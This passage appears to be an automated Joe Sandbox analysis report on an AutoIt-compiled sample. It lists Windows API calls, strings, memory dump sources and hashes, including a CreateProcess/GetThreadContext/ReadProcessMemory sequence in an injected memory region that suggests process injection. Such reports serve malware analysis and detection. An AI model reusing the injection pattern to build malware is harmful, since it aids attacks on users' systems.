                                                    • LoadIconW.USER32(000000A2), ref: 00603AAC
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AD2
                                                    • RegisterClassExW.USER32(?), ref: 00603B28
                                                      • Part of subcall function 00603041: GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                      • Part of subcall function 00603041: RegisterClassExW.USER32(00000030), ref: 0060309E
                                                      • Part of subcall function 00603041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                      • Part of subcall function 00603041: InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                      • Part of subcall function 00603041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                      • Part of subcall function 00603041: LoadIconW.USER32(000000A9), ref: 006030F2
                                                      • Part of subcall function 00603041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: f9286c43ca4890681400bfda1c078ef2f43e378595f676c573fadfb72756bf1f
                                                    • Instruction ID: cd9bfa6ae38986270c0293badb9f204d967313780939add43b7b90bb4487e04e
                                                    • Opcode Fuzzy Hash: f9286c43ca4890681400bfda1c078ef2f43e378595f676c573fadfb72756bf1f
                                                    • Instruction Fuzzy Hash: C7212E71D41304BFEB109FA4EC09FAD7FB6FB08711F105129F505A62A0D7BA56548F98

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bl
                                                    • API String ID: 1825951767-245244940
                                                    • Opcode ID: afb52555122d7ea4629ee311205be1f232006cbc5d1c9a82945b4ce9d94be7b4
                                                    • Instruction ID: e2e2c372bdad9c454fb597907ac9fa949ab430ce8b60552cdf43154f4f1639f2
                                                    • Opcode Fuzzy Hash: afb52555122d7ea4629ee311205be1f232006cbc5d1c9a82945b4ce9d94be7b4
                                                    • Instruction Fuzzy Hash: 7EA13D719502299ACB48EBA4DC95EEFB77EBF14300F00052EF512A72D1EF745A09CBA4

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006203D3
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006203DB
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006203E6
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006203F1
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006203F9
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00620401
                                                      • Part of subcall function 00616259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0060FA90), ref: 006162B4
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0060FB2D
                                                    • OleInitialize.OLE32(00000000), ref: 0060FBAA
                                                    • CloseHandle.KERNEL32(00000000), ref: 006449F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: <gl$\dl$%i$cl
                                                    • API String ID: 1986988660-2485871852
                                                    • Opcode ID: c08b54d01595dbbd0b70e7a7e0e2e6a0d3136ab8547f373d24651975795e6a52
                                                    • Instruction ID: cfb074fda6174c6f87b7da7ea6909ab6367b41a18e52e55f0c531b7d83a47680
                                                    • Opcode Fuzzy Hash: c08b54d01595dbbd0b70e7a7e0e2e6a0d3136ab8547f373d24651975795e6a52
                                                    • Instruction Fuzzy Hash: 958199B09012808EC788EF29E955E757BE7EB98309720E53EF419C7262EB758405CF6D

                                                    Control-flow Graph
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 039426D1
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 039428F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                    • Instruction ID: c5ca164de009036473f97baf54a56511567ffdcba3a21160eee08b30168d6e3a
                                                    • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                    • Instruction Fuzzy Hash: 5AA1F874E00209EBDB14CFA4C994FEEBBB5FF48304F248959E545BB280D7759A81CB94

                                                    Control-flow Graph
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A15
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A36
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00603A4A
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00603A53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 668ce5fe46c3ae61167fd53e1aba6623d3030a44e06fb9924294746c96e26c77
                                                    • Instruction ID: 98212ada01ed2035b844a1a217ea2229817d10e1c2a6d64f220c9e6af7f53a54
                                                    • Opcode Fuzzy Hash: 668ce5fe46c3ae61167fd53e1aba6623d3030a44e06fb9924294746c96e26c77
                                                    • Instruction Fuzzy Hash: 5EF03A70600290BEEB301B23EC48E373E7FD7C6F50B00112AB900A2171C2BA0841CAB8

                                                    Control-flow Graph
                                                    APIs
                                                      • Part of subcall function 039422A0: Sleep.KERNELBASE(000001F4), ref: 039422B1
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 039424F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: KHJX5G364S2SZ0OFU8AP9A1I7LV23
                                                    • API String ID: 2694422964-588014373
                                                    • Opcode ID: f7f3e73d0b34ea3a4fea421243b8ddf7416bf1e50123643d03cac27a8f1533de
                                                    • Instruction ID: acbb289be5b4666f02b43ae366b128df427afafcd2359686d1b28361ae7996e5
                                                    • Opcode Fuzzy Hash: f7f3e73d0b34ea3a4fea421243b8ddf7416bf1e50123643d03cac27a8f1533de
                                                    • Instruction Fuzzy Hash: 29618270D04288DAEF11DBF4C854BDEBBB8AF15304F044599E6487B2C1D7BA0B49CBA6

                                                    Control-flow Graph
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0063D5EC
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • _memset.LIBCMT ref: 0060418D
                                                    • _wcscpy.LIBCMT ref: 006041E1
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006041F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 2f1010b30a3a2c96cbdea9c375a828adebbe1f11abcbaf5699a61bbb11e6a4c4
                                                    • Instruction ID: 3826cb3ed91999bfadb46615d0ec5e8fc725d41eb178e80c69a747585e11fc1b
                                                    • Opcode Fuzzy Hash: 2f1010b30a3a2c96cbdea9c375a828adebbe1f11abcbaf5699a61bbb11e6a4c4
                                                    • Instruction Fuzzy Hash: AC31F3B1448304AAD779EB60DC45FEB73EAAF44300F10451EF184921E1EF74A748CB9A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                    • Instruction ID: 8c02ecb1e1abe4b69e5a682e2c1a4dd4321a184b339515645c47cd9d38132860
                                                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                    • Instruction Fuzzy Hash: 1B519030A01F25DBDB348FA9A8846AE77A7AF40320F248629F826962E0D7709D558F54
                                                    APIs
                                                      • Part of subcall function 00604F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604F6F
                                                    • _free.LIBCMT ref: 0063E68C
                                                    • _free.LIBCMT ref: 0063E6D3
                                                      • Part of subcall function 00606BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606D0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 2861923089-1757145024
                                                    • Opcode ID: 6b03b7f2b97d933b43cb383d224831eea6b4668af8839749f98b7b58078953ec
                                                    • Instruction ID: c11763d3a22269e612bae641be7da0eaf4433e4c0bbad25662d40bceb25a5297
                                                    • Opcode Fuzzy Hash: 6b03b7f2b97d933b43cb383d224831eea6b4668af8839749f98b7b58078953ec
                                                    • Instruction Fuzzy Hash: DD919E71910219AFCF48EFA4C8919EEB7B6FF19314F00442DF816AB2D1DB31A905CBA4
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006035A1,SwapMouseButtons,00000004,?), ref: 006035D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 006035F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 00603617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
                                                    • Instruction ID: 7e9163d595a6ba6cd7ec6ab4840e6cae6fe1b5410c1f754977c7b8824851b7d2
                                                    • Opcode Fuzzy Hash: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
                                                    • Instruction Fuzzy Hash: 83114871560228BFDB248F64DC409EFB7BEEF04741F105569E805D7350D6729E409760
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03941A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03941AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03941B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                    • Instruction ID: abe90e9741a395df23f5e71500950625dec9b202c4096bce0f68b5710a2f8c64
                                                    • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                    • Instruction Fuzzy Hash: 2F620A34A14258DBEB24CFA4C850BDEB376EF58300F1095A9D10DEB3A4E7769E81CB59
                                                    APIs
                                                      • Part of subcall function 00605045: _fseek.LIBCMT ref: 0060505D
                                                      • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AAE
                                                      • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AC1
                                                    • _free.LIBCMT ref: 0066992C
                                                    • _free.LIBCMT ref: 00669933
                                                    • _free.LIBCMT ref: 0066999E
                                                      • Part of subcall function 00622F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00629C64), ref: 00622FA9
                                                      • Part of subcall function 00622F95: GetLastError.KERNEL32(00000000,?,00629C64), ref: 00622FBB
                                                    • _free.LIBCMT ref: 006699A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: AU3!P/i$EA06
                                                    • API String ID: 4104443479-1974690362
                                                    APIs
                                                    • _memset.LIBCMT ref: 0063EE62
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0063EEAC
                                                      • Part of subcall function 006048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006048A1,?,?,006037C0,?), ref: 006048CE
                                                      • Part of subcall function 006209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006209F4
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00669B82
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00669B99
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    APIs
                                                    • _memset.LIBCMT ref: 00604401
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006044A6
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006044C3
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00625963
                                                      • Part of subcall function 0062A3AB: __NMSG_WRITE.LIBCMT ref: 0062A3D2
                                                      • Part of subcall function 0062A3AB: __NMSG_WRITE.LIBCMT ref: 0062A3DC
                                                    • __NMSG_WRITE.LIBCMT ref: 0062596A
                                                      • Part of subcall function 0062A408: GetModuleFileNameW.KERNEL32(00000000,006C43BA,00000104,?,00000001,00000000), ref: 0062A49A
                                                      • Part of subcall function 0062A408: ___crtMessageBoxW.LIBCMT ref: 0062A548
                                                      • Part of subcall function 006232DF: ___crtCorExitProcess.LIBCMT ref: 006232E5
                                                      • Part of subcall function 006232DF: ExitProcess.KERNEL32 ref: 006232EE
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    • RtlAllocateHeap.NTDLL(01300000,00000000,00000001,00000000,?,?,?,00621013,?), ref: 0062598F
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006697D2,?,?,?,?,?,00000004), ref: 00669B45
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00669B5B
                                                    • CloseHandle.KERNEL32(00000000,?,006697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00669B62
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    APIs
                                                    • _free.LIBCMT ref: 00668FA5
                                                      • Part of subcall function 00622F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00629C64), ref: 00622FA9
                                                      • Part of subcall function 00622F95: GetLastError.KERNEL32(00000000,?,00629C64), ref: 00622FBB
                                                    • _free.LIBCMT ref: 00668FB6
                                                    • _free.LIBCMT ref: 00668FC8
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00604992
                                                      • Part of subcall function 006235AC: __lock.LIBCMT ref: 006235B2
                                                      • Part of subcall function 006235AC: DecodePointer.KERNEL32(00000001,?,006049A7,006581BC), ref: 006235BE
                                                      • Part of subcall function 006235AC: EncodePointer.KERNEL32(?,?,006049A7,006581BC), ref: 006235C9
                                                      • Part of subcall function 00604A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00604A73
                                                      • Part of subcall function 00604A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00604A88
                                                      • Part of subcall function 00603B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B7A
                                                      • Part of subcall function 00603B4C: IsDebuggerPresent.KERNEL32 ref: 00603B8C
                                                      • Part of subcall function 00603B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,006C62F8,006C62E0,?,?), ref: 00603BFD
                                                      • Part of subcall function 00603B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00603C81
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006049D2
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: 1544f880f04030b0f8c2193567444331beb8ee10b35783077cf1882ccc6c878c
                                                    • Instruction ID: e48cd093eedc6e601cb3a33fde44b9fbc2a0c595fd0babae5b58c373924f33cf
                                                    • Opcode Fuzzy Hash: 1544f880f04030b0f8c2193567444331beb8ee10b35783077cf1882ccc6c878c
                                                    • Instruction Fuzzy Hash: B6118C719483119BC314DF29EC05D1BFBEAEB94710F00851EF445832A1DB749A45CB9A
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00605981,?,?,?,?), ref: 00605E27
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00605981,?,?,?,?), ref: 0063E19C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 619aaabe1949ea15ac64a7936bf5e37b3f8723b2a016095a561ffb0016d74b1b
                                                    • Instruction ID: 95d93236df5c9db4006657ee848168969988d0acf3f441ee76e5a0cead67861d
                                                    • Opcode Fuzzy Hash: 619aaabe1949ea15ac64a7936bf5e37b3f8723b2a016095a561ffb0016d74b1b
                                                    • Instruction Fuzzy Hash: FF01B970284709BEF3681E14CC8AFA7379DEB01768F108318FAE65A2E0C6B01D458F50
                                                    APIs
                                                      • Part of subcall function 0062594C: __FF_MSGBANNER.LIBCMT ref: 00625963
                                                      • Part of subcall function 0062594C: __NMSG_WRITE.LIBCMT ref: 0062596A
                                                      • Part of subcall function 0062594C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001,00000000,?,?,?,00621013,?), ref: 0062598F
                                                    • std::exception::exception.LIBCMT ref: 0062102C
                                                    • __CxxThrowException@8.LIBCMT ref: 00621041
                                                      • Part of subcall function 006287DB: RaiseException.KERNEL32(?,?,?,006BBAF8,00000000,?,?,?,?,00621046,?,006BBAF8,?,00000001), ref: 00628830
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 3902256705-0
                                                    • Opcode ID: 58ddbfe1b93e486c5de8325581b6ed458fed8e9b8fe2c0c962bfefebb47c1076
                                                    • Instruction ID: 830258377f1e12fc7fb2d232e0ed21d01f99baa50887c140a5f4146925890bf7
